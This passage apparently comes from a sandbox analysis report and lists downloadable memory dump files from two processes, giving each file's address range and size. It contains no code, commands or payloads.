memory/2792-15-0x00007FFC774A0000-0x00007FFC77F61000-memory.dmp

Filesize
10.8MB

Download
memory/2792-49-0x00007FFC774A0000-0x00007FFC77F61000-memory.dmp

Filesize
10.8MB

Download
memory/2792-48-0x00007FFC774A3000-0x00007FFC774A5000-memory.dmp

Filesize
8KB

Download
memory/2792-16-0x00007FFC774A0000-0x00007FFC77F61000-memory.dmp

Filesize
10.8MB

Download
memory/2792-17-0x0000023434AB0000-0x0000023435256000-memory.dmp

Filesize
7.6MB

Download
memory/2792-19-0x00000234346F0000-0x000002343470C000-memory.dmp

Filesize
112KB

Download
memory/2792-4-0x00007FFC774A3000-0x00007FFC774A5000-memory.dmp

Filesize
8KB

Download
memory/5052-118-0x0000000006C30000-0x0000000006C74000-memory.dmp

Filesize
272KB

Download
memory/5052-119-0x0000000006DB0000-0x0000000006E26000-memory.dmp

Filesize
472KB

Download